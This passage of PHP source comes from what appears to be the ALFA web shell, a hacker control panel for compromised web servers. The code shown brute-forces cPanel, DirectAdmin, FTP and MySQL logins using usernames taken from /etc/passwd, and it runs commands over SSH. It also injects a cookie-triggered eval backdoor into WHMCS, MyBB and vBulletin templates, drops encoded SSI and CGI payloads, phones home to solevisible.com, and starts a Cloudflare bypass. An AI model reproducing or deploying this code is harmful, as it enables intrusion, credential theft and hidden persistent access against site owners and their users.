2266if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
2267$result = curl_exec($curl);
2268$curl_errno = curl_errno($curl);
2269$curl_error = curl_error($curl);
2270if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2271elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
2272echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2273$info['target'] = $url;
2274CrackerResualt($info);
2275}
2276curl_close($curl);
2277}
2278function Alfa_CP_Cracker($info){
2279$url = $info['protocol'].$info['target'].':'.$info['port'];
2280$curl = curl_init();
2281curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2282curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2283curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2284curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2285curl_setopt($curl, CURLOPT_HEADER,0);
2286curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
2287curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
2288curl_setopt($curl, CURLOPT_URL, $url);
2289$result = curl_exec($curl);
2290$curl_errno = curl_errno($curl);
2291$curl_error = curl_error($curl);
2292if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2293elseif(preg_match('/filemanager/i',$result)){
2294echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2295$info['target'] = $url;
2296CrackerResualt($info);
2297}
2298curl_close($curl);
2299}
2300function Alfa_FTP_Cracker($info){
2301$url = $info['protocol'].$info['target'];
2302$curl = curl_init();
2303curl_setopt($curl, CURLOPT_URL, $url);
2304curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2305curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2306curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
2307$result = curl_exec($curl);
2308$curl_errno = curl_errno($curl);
2309$curl_error = curl_error($curl);
2310if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2311elseif(preg_match('/(\d+):(\d+)/i',$result)){
2312echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2313$info['target'] = $url;
2314CrackerResualt($info);
2315}
2316curl_close($curl);
2317}
2318function Alfa_Mysql_Cracker($info){
2319if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
2320CrackerResualt($info);
2321echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2322}
2323}
2324function Alfa_FTPC($info){
2325if($con=@ftp_connect($info['target'],$info['port'])){
2326if($con){
2327$login=@ftp_login($con,$info['username'],$info['password']);
2328if($login){CrackerResualt($info);}}}
2329@ftp_close($con);
2330}
2331function CrackerResualt($info){
2332$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
2333$c = @fopen($info['fcrack'],'a+');
2334@fwrite($c, $res);
2335@fclose($c);
2336}
2337function Alfa_Call_Function_Cracker($method,$info){
2338switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
2339}
2340function alfaCrackers(){
2341alfahead();
2342AlfaNum(9,10);
2343echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
2344foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
2345echo '</select> Protocol: <select id="protocol" name="protocol">';
2346foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
2347echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
2348Port: <input id="port" type="text" name="port" value="2083">
2349<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
2350<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
2351  <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
2352Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
2353<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
2354$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
2355$port = $_POST['alfa2'];
2356$usernames= $_POST['alfa3'];
2357$passwords = $_POST['alfa4'];
2358$fcrack = $_POST['alfa5'];
2359$cracking = $_POST['alfa6'];
2360$protocol = $_POST['alfa7'];
2361$loginpanel = $_POST['alfa8'];
2362$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
2363if($cracking=='start'){
2364echo __pre();
2365$exuser = explode("\n",$usernames);
2366$expw = explode("\n",$passwords);
2367foreach($exuser as $user){
2368foreach($expw as $pw){
2369$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
2370Alfa_Call_Function_Cracker($loginpanel,$array);
2371}
2372}
2373echo '<br><font color="red">Attack Finished...</font>';
2374}
2375echo '</div>';
2376alfafooter();
2377}
2378function alfassh2(){
2379if(function_exists('ssh2_connect')){
2380$_SESSION['connected']= false;
2381$ssh_ip = $_POST['alfa1'];
2382$ssh_login = $_POST['alfa2'];
2383$ssh_pass = $_POST['alfa3'];
2384$ssh_port = $_POST['alfa4'];
2385$ssh_command = $_POST['alfa5'];
2386if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
2387{
2388if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
2389{
2390$_SESSION['connected']= true;
2391}
2392}
2393if($_SESSION['connected']!== true){
2394alfahead();
2395echo "<div class=header>";
2396echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
2397alfafooter();
2398}
2399if($_SESSION['connected']==true){
2400alfahead();
2401echo "<div class=header>";
2402echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
2403$alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
2404stream_set_blocking($alfastream,true);
2405$output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
2406if($_POST['alfa6']=='>>'){
2407echo '<pre class=ml1>';
2408ob_start();
2409echo stream_get_contents($output);
2410echo htmlspecialchars(ob_get_clean());
2411}
2412echo "</div>";
2413alfafooter();
2414}}else{
2415alfahead();
2416echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
2417alfafooter();
2418}
2419}
2420function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
2421function alfaShellInjectors(){
2422alfahead();
2423echo '<div class=header>';
2424AlfaNum(11);
2425echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
2426$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
2427if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
2428AlfaNum();
2429echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
2430$table = array('td1' =>
2431 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
2432 'td2' =>
2433 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2434 'td3' =>
2435 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2436 'td4' =>
2437 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2438 'td5' =>
2439 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
2440);
2441create_table($table);
2442echo $selector;
2443echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
2444if(isset($_POST['alfa6'])) {
2445$dbu = $_POST['alfa6'];
2446$dbn = $_POST['alfa7'];
2447$dbp = $_POST['alfa8'];
2448$dbh = $_POST['alfa9'];
2449$path = $_POST['alfa10'];
2450$method = $_POST['alfa4'];
2451$index = "{php}".ALFA_UPLOADER.";{/php}";
2452$newin = str_replace("'","\'",$index);
2453$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2454if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
2455if(filter_var($path,FILTER_VALIDATE_URL)){
2456$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2457$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
2458$soleGet = mysqli_fetch_assoc($soleSave);
2459$tempSave1 = $soleGet['message'];
2460$tempSave = str_replace("'","\'",$tempSave1);
2461$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
2462$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
2463$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2464$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
2465if(function_exists('curl_version') && $method == 'auto'){
2466$AlfaSole = new AlfaCURL(true);
2467$saveurl = $AlfaSole->Send($path."/pwreset.php");
2468$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
2469$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
2470$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
2471$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
2472__alert("shell injectet...");
2473$ff= 'http://'.$path."/solevisible.php";
2474output($ff);}else{
2475echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
2476}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
2477AlfaNum(1,2,3,5);
2478echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
2479";
2480$table = array('td1' =>
2481 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2482 'td2' =>
2483 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
2484 'td3' =>
2485 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
2486 'td4' =>
2487 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2488 'td5' =>
2489 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
2490);
2491create_table($table);
2492echo $selector;
2493echo "<p><input type=submit value=' '></p></form></center></center>";
2494if(isset($_POST['alfa6'])) {
2495$dbu = $_POST['alfa6'];
2496$dbn = $_POST['alfa7'];
2497$dbp = $_POST['alfa8'];
2498$dbh = $_POST['alfa9'];
2499$prefix = $_POST['alfa10'];
2500$method = $_POST['alfa4'];
2501$shellCode = "{\${".ALFA_UPLOADER."}}";
2502$newinshell = str_replace("'","\'",$shellCode);
2503if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
2504$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2505$inject = "select template from {$prefix}templates where title= 'calendar'";
2506$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
2507$GetTemp = mysqli_fetch_assoc($result);
2508$saveDate = $GetTemp['template'];
2509$repsave = str_replace($shellCode,"",$saveDate);
2510$repsave = str_replace("'","\'",$repsave);
2511$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
2512$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
2513$geturl = "select value from {$prefix}settings where name= 'bburl'";
2514$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
2515$rowb = mysqli_fetch_assoc($findurl);
2516$furl = $rowb['value'];
2517$realurl = parse_url($furl,PHP_URL_HOST);
2518$realpath = parse_url($furl,PHP_URL_PATH);
2519$res = false;
2520$AlfaCurl = new AlfaCURL();
2521if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
2522if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2523@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
2524@fputs($fsock, "HOST: $realurl\r\n");
2525@fputs($fsock, "Connection: close\r\n\r\n");
2526$check = fgets($fsock);
2527if(preg_match("/200 OK/i",$check)){
2528$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
2529$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
2530@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
2531$AlfaCurl->Send($realurl.$realpath."/calendar.php");
2532$res = true;
2533}
2534if($res){
2535$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2536output($ff);
2537}else{
2538$ff = 'http://'.$realurl.$realpath."/calendar.php";
2539$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2540echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
2541}}}}
2542if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
2543AlfaNum(1,2,7,9,10);
2544echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
2545$table = array('td1' =>
2546 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2547 'td2' =>
2548 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
2549 'td3' =>
2550 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
2551 'td4' =>
2552 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
2553 'td5' =>
2554 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
2555);
2556create_table($table);
2557echo $selector;
2558echo '<p><input type="submit" value=" " /></p></form></center>';
2559if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
2560$method = $_POST['alfa8'];
2561$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
2562$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
2563$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
2564$recivedata = @mysqli_query($conn,$rec);
2565$getd = @mysqli_fetch_assoc($recivedata);
2566$savetoass = $getd['template'];
2567$code = str_replace("'","\'",$code);
2568$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
2569$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
2570$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
2571$getval = @mysqli_fetch_assoc($geturl);
2572$saveval = $getval['value'];
2573$realurl = parse_url($saveval,PHP_URL_HOST);
2574$realpath = parse_url($saveval,PHP_URL_PATH);
2575$res = false;
2576$AlfaCurl = new AlfaCURL();
2577if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
2578if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2579@fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
2580@fputs($fsock, "HOST: $realurl\r\n");
2581@fputs($fsock, "Connection: close\r\n\r\n");
2582$check = fgets($fsock);
2583if(preg_match("/200 OK/i",$check)){
2584$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
2585$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2586$res = true;
2587}
2588@fclose($fsock);
2589}
2590}elseif(function_exists('curl_version') && $method == 'auto'){
2591$AlfaCurl->Send($realurl.$realpath."/faq.php");
2592$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
2593$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2594$res = true;
2595}
2596if($res){
2597$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2598output($ff);
2599}else{
2600$ff = 'http://'.$realurl.$realpath."/faq.php";
2601$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2602echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
2603echo '</div>';
2604alfafooter();
2605}
2606function alfaupdatepath(){
2607 if($_POST['path']!=''){
2608 $_SESSION[__LAST_CWD__] = $_POST['path'];
2609 }
2610 echo($_SESSION[__LAST_CWD__]);
2611}
2612function alfacheckfiletype(){
2613 $path = $_POST['path'];
2614 $arg = $_POST['arg'];
2615 if(@is_file($path.'/'.$arg)){
2616 echo("file");
2617 }else{
2618 echo("dir");
2619 }
2620}
2621function alfacheckupdate(){
2622 if(!isset($_COOKIE['alfa_checkupdate'])){
2623 if(function_exists("curl_version")){
2624 $update = new AlfaCURL();
2625 $json = $update->Send("http://solevisible.com/update.json");
2626 $json = @json_decode($json);
2627 if($json){
2628 if(__ALFA_VERSION__ != $json->version){
2629 @setcookie("alfa_checkupdate", "1", time()+86400);
2630 echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
2631 }
2632 }
2633 }
2634 }
2635}
2636function alfaWriteTocgiapi($name, $source){
2637 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
2638 @mkdir('alfacgiapi',0755);
2639 __write_file("alfacgiapi/".$name, __get_resource($source));
2640 @chmod("alfacgiapi/".$name, 0755);
2641}
2642function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
2643function alfaupdateheader(){
2644 if(!isset($_SESSION["updateheader_data"])){
2645 $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
2646 $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
2647 alfaWriteTocgiapi("getheader.alfa",$bash);
2648 $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
2649 if(@is_array(@json_decode($data,true))){
2650 $_SESSION["updateheader_data"] = $data;
2651 echo $data;
2652 }
2653 }else{
2654 echo $_SESSION["updateheader_data"];
2655 }
2656}
2657function alfassiShell(){
2658alfahead();
2659echo '<div class=header>';
2660@mkdir('alfa_shtml',0755);
2661@chdir('alfa_shtml');
2662alfacgihtaccess('shtml');
2663$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
2664@__write_file('alfa_ssi.shtml',__get_resource($code));
2665@chmod("alfa_ssi.shtml",0755);
2666echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
2667echo '</div>';
2668alfafooter();
2669}
2670function alfacloudflare(){
2671alfahead();
2672AlfaNum(8,9,10,7,6,5,4,3);
2673echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
2674<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
2675if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
2676$url = $_POST['alfa1'];
2677if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
2678$url = preg_replace('/^(https?):\/\//', '', $url);
2679$url = "http://www.".$url;
2680}
2681$headers = @get_headers($url, 1);
2682$server = $headers['Server'];
2683$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
2684if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
